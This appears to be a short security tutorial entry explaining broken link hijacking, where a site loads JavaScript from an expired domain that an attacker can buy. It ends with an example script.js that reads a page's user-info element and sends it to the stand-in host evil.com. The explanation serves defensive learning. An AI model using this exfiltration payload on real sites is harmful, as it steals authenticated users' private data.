Broken Link Hijacking

Broken Link Hijacking is an attack method that attacker can execute arbitrary code by hijacking link e.g. JavaScript file if target website is loading file with broken link.

- [broken-link-hijacking](https://edoverflow.com/2017/broken-link-hijacking/)

Investigation

Assume that target website loads external JavaScript file in example.com no longer exists as below.

<script src="//example.com/script.js"></script>

If attacker bought this domain, he can host arbitrary JavaScript file named script.js in the example.com root directory.


Exploitation Examples

Attacker can write arbitrary code for compromising users in script.js as example above.
For example, if target website includes sensitive information of authenticated user in the page where the broken link is loaded, attackers can send these information to their owned server.

// script.js
var secret = document.getElementById('userinfo');
var request = new XMLHttpRequest();
request.open('GET', 'http://evil.com/?data=' + secret, false);
request.send();